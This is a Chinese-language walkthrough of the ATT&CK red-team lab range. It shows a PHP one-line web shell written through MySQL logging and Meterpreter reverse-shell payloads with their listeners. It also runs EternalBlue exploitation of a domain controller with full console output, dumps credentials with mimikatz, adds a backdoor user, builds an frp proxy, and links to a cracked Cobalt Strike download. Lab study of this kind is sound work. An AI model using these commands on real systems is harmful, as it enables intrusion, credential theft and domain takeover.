# 环境搭建

http://www.yongsheng.site/2021/03/22/ATT&CK 红队评估实战靶场(一)/

https://www.bilibili.com/video/BV13W4y1t7qB?spm_id_from=333.999.0.0&vd_source=4b2ca0a221ea211ecd7881292e3ad4c

直接用 vmware 打开压缩包

网络拓扑

image-20220916192915061

win7 与 win

密码 : Asd123456789

win8 : Asd1234567890

根据视频说的,先将 NAT 的子网改为 52 ,DHCP 也要改成 52

image-20220916192938306

然后给 win7 添加一块桥接网卡即可

启动 phpstudy

image-20220916192947250

从外网访问

image-20220916192957225

# 信息收集

访问 win7 php 网站服务:

image-20220916193013682

看到是 php 探针,测试一下 mysql 弱口令

image-20220916193020700

Nmap 扫描开启了哪些端口

image-20220916193028227

dirsearch 扫一下后台

image-20220916193035004

发现 phpmyadmin

# 漏洞利用 getshell

# 后台 Getshell

进入 /phpmyadmin

默认账号密码登陆成功:root root

image-20220916193056921

我们查看一下 secure_file_priv 的值

SELECT @ @global.secure_file_priv

image-20220916193115252

说明不可以写文件 getshell

尝试开启全局日志利用 getshell

SELECT @ @global.secure_file_priv
show variables like '%general%';

image-20220916193127700

可以看到功能是关闭的且回显日志文件的路径

尝试开启并更改路径

image-20220916193140064

image-20220916193145571

写入一句话:

set global general_log='on'
set global general_log_file='C:/Users/liukaifeng01/Desktop/WWW/shell.php'
select "<?php eval($_POST[1]);?>"

蚁剑链接:

image-20220916193156023

# yxcms GetShell

看到里面还有一个 newyxcms,可以猜测里面还有一个 yxcms 系统

image-20220916193219112

然后查一下漏洞就登陆进去了

image-20220916193227946

https://forum.butian.net/share/164

编辑其 info.php

image-20220916193247388

然后访问

http://172.29.31.131/yxcms/protected/apps/default/view/default/info.php?
1=phpinfo();

image-20220916193303162

# 蚁剑利用

蚁剑查询身份:

image-20220916193330688

添加用户:

net user miku hongrisec@2020 /add
(增加一个名为miku 密码为hongrisec@2020的用户名)

image-20220916193346925

查看 miku 用户

image-20220916193357823

关闭防火墙:

# 控制 win

# 获取权限

# msf 木马

上线 msf

msfdb run

生成木马

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) >
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 172.29.31.
LHOST => 172.29.31.
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate - f exe - o exp.exe
[*] Writing 7168 bytes to exp.exe...

image-20220916193430896

然后上传木马

image-20220916193502669

然后 kali 里面监听

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.
LHOST => 0.0.0.
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0: 5555

image-20220916193519562

成功收到

image-20220916193526878

# Msvemon 生成木马

使用 msfvenom 生成 payload 文件,使用蚁剑上传到 win

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.29.31.62 LHOST=5555 -f
exe > shell.exe

image-20220916193703224

蚁剑上传木马

image-20220916193709659

运行木马:

image-20220916193716416

msf 开启监听

image-20220916193725529

# SMB ms17_010(正向)

这里有正向与反向

正向是设置靶机 ip rhost

反向需要设置自己攻击机的 ip lhost 与 lport

然后 payload 设置为正向

use exploit/windows/smb/ms17_010_eternalblue

然后设置 rhost 与 rport

set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.239.
set rport 445

成功

image-20220916193801414

msf 不行的时候可以清一下缓存

msfdb reinit
msfdb run

# 信息收集

先修改为 UST-8 编码,然后查看域信息

sysinfo
getuid (发现是administor权限)
getsystem (获取system权限)
C:\phpStudy\WWW>chcp 65001
chcp 65001
Active code page: 65001

image-20220916193925350

然后去找域控 ip

C:\phpStudy\WWW>net config workstation
net config workstation
Computer name \\STU
Full Computer name stu1.god.org //这个god.org就是域
User name Administrator
Workstation active on
NetBT_Tcpip_{ 55 ECD929-FBB2- 4 D96-B43D-8FFEB14A169F} ( 000 C2910F4D7)
NetBT_Tcpip_{ 9666 BA36-B530- 42 B9-ABE4-E02828813CB4} ( 000 C2910F4CD)
NetBT_Tcpip_{EC57C4EB-763E-4000- 9 CDE- 4 D7FF15DF74C} ( 02004 C4F4F50)
Software version Windows 7 Professional
Workstation domain GOD
Workstation Domain DNS Name god.org
Logon domain GOD
COM Open Timeout (sec) 0
COM Send Count (byte) 16
COM Send Timeout (msec) 250
The command completed successfully.
C:\phpStudy\WWW>net view
ping STU1net view
Ping request could not find host STU1net. Please check the name and try again.
C:\phpStudy\WWW>net view
net view
Server Name Remark

##### -------------------------------------------------------------------------------

##### \OWA

##### \ROOT-TVI862UBEH

##### \STU

The command completed successfully.

C:\phpStudy\WWW>ping ROOT-TVI862UBEH
ping ROOT-TVI862UBEH

Pinging ROOT-TVI862UBEH [192.168.52.141] with 32 bytes of data:
Reply from 192.168.52.141: bytes= 32 time= 1 ms TTL= 128
Reply from 192.168.52.141: bytes= 32 time< 1 ms TTL= 128
Reply from 192.168.52.141: bytes= 32 time< 1 ms TTL= 128
Reply from 192.168.52.141: bytes= 32 time< 1 ms TTL= 128

Ping statistics for 192.168.52.141:
Packets: Sent = 4 , Received = 4 , Lost = 0 ( 0 % loss),
Approximate round trip times in milli-seconds:
Minimum = 0 ms, Maximum = 1 ms, Average = 0 ms

C:\phpStudy\WWW>ping OWA
ping OWA

Pinging OWA.localdomain [192.168.52.138] with 32 bytes of data:
Reply from 192.168.52.138: bytes= 32 time< 1 ms TTL= 128
Reply from 192.168.52.138: bytes= 32 time= 20 ms TTL= 128
Reply from 192.168.52.138: bytes= 32 time< 1 ms TTL= 128
Reply from 192.168.52.138: bytes= 32 time< 1 ms TTL= 128

Ping statistics for 192.168.52.138:
Packets: Sent = 4 , Received = 4 , Lost = 0 ( 0 % loss),
Approximate round trip times in milli-seconds:
Minimum = 0 ms, Maximum = 20 ms, Average = 5 ms

这样我们知道域内主机 ip

image-20220916193941686

# 主机密码收集

Hashdump:看到用户的密码哈希值

Mimikatz:抓取明文密码

ps:mimikatz 模块已经合并为 kiwi 模块

load kiwi

# creds_all 命令直接获取密码:

image-20220916194008902

# OWA : 192.168.52.138 // 域控
# ROOT-TVI862UBEH : 192.168.52.141 // 客户端

# 拿下域控

然后 ps 偷一个令牌

这里偷 httpd 的令牌拿到管理员权限(虽然之前自动为管理员

image-20220916194039957

meterpreter > migrate 2840
[*] Migrating from 4300 to 2840...
[*] Migration completed successfully.
meterpreter > getuid
Server username: GOD\Administrator

image-20220916194106276

# 横向移动

# win2008

# 添加路由

这里没加路由,添加一个

msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
 2 meterpreter x64/windows GOD\Administrator @ STU1 172.29.31.62: 5555
-> 172.29.31.66: 45246 (172.29.31.66)
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions 2
[*] Starting interaction with 2...
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against STU1
[*] Searching for subnets to autoroute.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.29.31.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.52.0/255.255.255.0 from host's routing table.
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/ms17_010_eternalblue) >

image-20220916194141769

# frp 代理

https://www.freebuf.com/articles/network/271719.html

https://blog.csdn.net/weixin_42109829/article/details/122554815?ops_request_misc=&request_id=&biz_id=102&utm_term=frp 代理失败 & utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-122554815.142v42pc_rank_34_1,185v2control&spm=1018.2226.3001.4187

# frps.ini

[common]
server_addr = 172.29.31.62
server_port = 7000

[socks_proxy]
type = tcp
remote_port = 1579
plugin = socks5

# frpc.ini

[common]
bind_port = 7000

上传 frpc 客户端

meterpreter > upload frpc.exe
[*] uploading : /home/kali/Desktop/frpc.exe -> frpc.exe
[*] Uploaded 8.00 MiB of 10.62 MiB (75.3%): /home/kali/Desktop/frpc.exe ->
frpc.exe
[*] Uploaded 10.62 MiB of 10.62 MiB (100.0%): /home/kali/Desktop/frpc.exe ->
frpc.exe
[*] uploaded : /home/kali/Desktop/frpc.exe -> frpc.exe
meterpreter > upload frpc.ini
[*] uploading : /home/kali/Desktop/frpc.ini -> frpc.ini
[*] Uploaded 128.00 B of 128.00 B (100.0%): /home/kali/Desktop/frpc.ini ->
frpc.ini
[*] uploaded : /home/kali/Desktop/frpc.ini -> frpc.ini

image-20220916194526973

配置好后启动

image-20220916194542563

此时就算退出隧道也不会断开

# 永恒之蓝

msf6 exploit(windows/smb/psexec) > search ms17- 010
Matching Modules
================
# Name Disclosure Date Rank Check
Description

0 exploit/windows/smb/ms17_010_eternalblue 2017 - 03 - 14 average Yes
MS17- 010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017 - 03 - 14 normal Yes
MS17- 010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code
Execution
2 auxiliary/admin/smb/ms17_010_command 2017 - 03 - 14 normal No
MS17- 010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows
Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No
MS17- 010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017 - 04 - 14 great Yes
SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4 , use 4 or use
exploit/windows/smb/smb_doublepulsar_rce
msf6 exploit(windows/smb/psexec) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(multi/handler) > set Proxies socks5:127.0.0.1: 6000
Proxies => socks5:127.0.0.1: 6000

msf6 exploit(multi/handler) > setg ReverseAllowProxy true
ReverseAllowProxy => true
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 172.29.31.62: 4444 :- -
[*] Started reverse TCP handler on 0.0.0.0: 4444
[*] 192.168.52.138: 445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.52.138: 445 - Host is likely VULNERABLE to MS17- 010! - Windows
Server 2008 R2 Datacenter 7601 Service Pack 1 x64 ( 64 - bit)
[*] 192.168.52.138: 445 - Scanned 1 of 1 hosts ( 100 % complete)
[+] 192.168.52.138: 445 - The target is vulnerable.
[*] 192.168.52.138: 445 - Connecting to target for exploitation.
[+] 192.168.52.138: 445 - Connection established for exploitation.
[+] 192.168.52.138: 445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.52.138: 445 - CORE raw buffer dump ( 53 bytes)
[*] 192.168.52.138: 445 - 0x00000000 57 69 6 e 64 6f 77 73 20 53 65 72 76 65 72
20 32 Windows Server 2
[*] 192.168.52.138: 445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6 e
74 65 008 R2 Datacente
[*] 192.168.52.138: 445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65
20 50 r 7601 Service P
[*] 192.168.52.138: 445 - 0x00000030 61 63 6 b 20 31
ack 1
[+] 192.168.52.138: 445 - Target arch selected valid for arch indicated by
DCE/RPC reply
[*] 192.168.52.138: 445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.52.138: 445 - Sending all but last fragment of exploit packet
[*] 192.168.52.138: 445 - Starting non-paged pool grooming
[+] 192.168.52.138: 445 - Sending SMBv2 buffers
[+] 192.168.52.138: 445 - Closing SMBv1 connection creating free hole adjacent to
SMBv2 buffer.
[*] 192.168.52.138: 445 - Sending final SMBv2 buffers.
[*] 192.168.52.138: 445 - Sending last fragment of exploit packet!
[*] 192.168.52.138: 445 - Receiving response from exploit packet
[+] 192.168.52.138: 445 - ETERNALBLUE overwrite completed successfully
(0xC000000D)!
[*] 192.168.52.138: 445 - Sending egg to corrupted connection.
[*] 192.168.52.138: 445 - Triggering free of corrupted buffer.
[-] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=
[-] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=
[-] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=
[*] 192.168.52.138: 445 - Connecting to target for exploitation.
[+] 192.168.52.138: 445 - Connection established for exploitation.
[+] 192.168.52.138: 445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.52.138: 445 - CORE raw buffer dump ( 53 bytes)
[*] 192.168.52.138: 445 - 0x00000000 57 69 6 e 64 6f 77 73 20 53 65 72 76 65 72
20 32 Windows Server 2
[*] 192.168.52.138: 445 - 0x00000010 30 30 38 20 52 32 20 44 61 74 61 63 65 6 e
74 65 008 R2 Datacente
[*] 192.168.52.138: 445 - 0x00000020 72 20 37 36 30 31 20 53 65 72 76 69 63 65
20 50 r 7601 Service P

[*] 192.168.52.138: 445 - 0x00000030 61 63 6 b 20 31
ack 1
[+] 192.168.52.138: 445 - Target arch selected valid for arch indicated by
DCE/RPC reply
[*] 192.168.52.138: 445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.52.138: 445 - Sending all but last fragment of exploit packet
[*] 192.168.52.138: 445 - Starting non-paged pool grooming
[+] 192.168.52.138: 445 - Sending SMBv2 buffers
[+] 192.168.52.138: 445 - Closing SMBv1 connection creating free hole adjacent to
SMBv2 buffer.
[*] 192.168.52.138: 445 - Sending final SMBv2 buffers.
[*] 192.168.52.138: 445 - Sending last fragment of exploit packet!
[*] 192.168.52.138: 445 - Receiving response from exploit packet
[+] 192.168.52.138: 445 - ETERNALBLUE overwrite completed successfully
(0xC000000D)!
[*] 192.168.52.138: 445 - Sending egg to corrupted connection.
[*] 192.168.52.138: 445 - Triggering free of corrupted buffer.
[*] Sending stage ( 200262 bytes) to 172.29.31.177
[*] Meterpreter session 2 opened (172.29.31.62: 4444 -> 172.29.31.177: 52520 ) at
2022 - 08 - 29 23 : 05 : 36 - 0400
[+] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=
[+] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=
[+] 192.168.52.138: 445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=

meterpreter > ipconfig

image-20220916194643750

成功上线

# win2003

# 远程桌面

# 利用永恒之蓝针对 32 位的版本去修改注册表开启远程桌面

meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(windows/smb/ms17_010_eternalblue) > search msf17- 010
[-] No results from search
msf6 exploit(windows/smb/ms17_010_eternalblue) > search ms17- 010
Matching Modules
================
# Name Disclosure Date Rank Check
Description

0 exploit/windows/smb/ms17_010_eternalblue 2017 - 03 - 14 average Yes
MS17- 010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017 - 03 - 14 normal Yes
MS17- 010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code
Execution
2 auxiliary/admin/smb/ms17_010_command 2017 - 03 - 14 normal No
MS17- 010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows
Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No
MS17- 010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017 - 04 - 14 great Yes
SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 4 , use 4 or use
exploit/windows/smb/smb_doublepulsar_rce
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 2
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.141
RHOSTS => 192.168.52.141
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 'REG ADD
\HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Sserver /v fDenyTSConnections
/t reg_dword /d 00000000 /f'
COMMAND => REG ADD \HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Sserver /v
fDenyTSConnections /t reg_dword /d 00000000 /f

然后修改 proxychain 配置文件开启即可(我这没成功)

# Cobalt Strike

https://blog.csdn.net/weixin_47830774/article/details/121885329?ops_request_misc=%7B%22request%5Fid%22%3A%22166183325216780357293152%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=166183325216780357293152&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_click~default-1-121885329-null-null.142v42pc_rank_34_1,185v2control&utm_term=cobalt%20strike%E5%AE%89%E8%A3%85&spm=1018.2226.3001.4187

# 下载地址

https://gitee.com/ssooking/cobaltstrike-cracked/repository/archive/master.zip

./teamserver 172.29.31.62 12345678
另起一个端口
./start.sh

image-20220916194807696

msf6 auxiliary(admin/smb/ms17_010_command) > exploit
[*] 192.168.52.141: 445 - Target OS: Windows Server 2003 3790
[*] 192.168.52.141: 445 - Filling barrel with fish... done
[*] 192.168.52.141: 445 - <---------------- | Entering Danger Zone | ---------
------->
[*] 192.168.52.141: 445 - [*] Preparing dynamite...
[*] 192.168.52.141: 445 - Trying stick 1 (x64)...Miss
[*] 192.168.52.141: 445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141: 445 - [+] Successfully Leaked Transaction!
[*] 192.168.52.141: 445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141: 445 - <---------------- | Leaving Danger Zone | ----------
------>
[*] 192.168.52.141: 445 - Reading from CONNECTION struct at: 0x8d24c4d0
[*] 192.168.52.141: 445 - Built a write-what-where primitive...
[+] 192.168.52.141: 445 - Overwrite complete... SYSTEM session obtained!
[+] 192.168.52.141: 445 - Service start timed out, OK if running a command or
non-service executable...
[*] 192.168.52.141: 445 - Getting the command output...
[*] 192.168.52.141: 445 - Command finished with no output
[*] 192.168.52.141: 445 - Executing cleanup...
[+] 192.168.52.141: 445 - Cleanup was successful
[+] 192.168.52.141: 445 - Command completed successfully!
[*] 192.168.52.141: 445 - Output for "REG ADD
\HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Sserver /v fDenyTSConnections
/t reg_dword /d 00000000 /f":
[*] 192.168.52.141: 445 - Scanned 1 of 1 hosts ( 100 % complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/smb/ms17_010_command) >

设置监听

image-20220916194836159

add, 填一个 kali ip 与端口就行

image-20220916194851257

然后生成后门

image-20220916194927155

选择 Listener

image-20220916194935750

生成 exe 上传 138 靶机,然后执行就能收到

image-20220916194945174

选择交互即可

接着 net view

image-20220916194957321

往上点击发现主机

image-20220916195004406

下面横向移动即可

image-20220916195013174

选择

image-20220916195021226

成功上线

image-20220916195027974

请我喝[茶]~( ̄▽ ̄)~*

miku233 微信支付

微信支付

miku233 支付宝

支付宝

miku233 贝宝

贝宝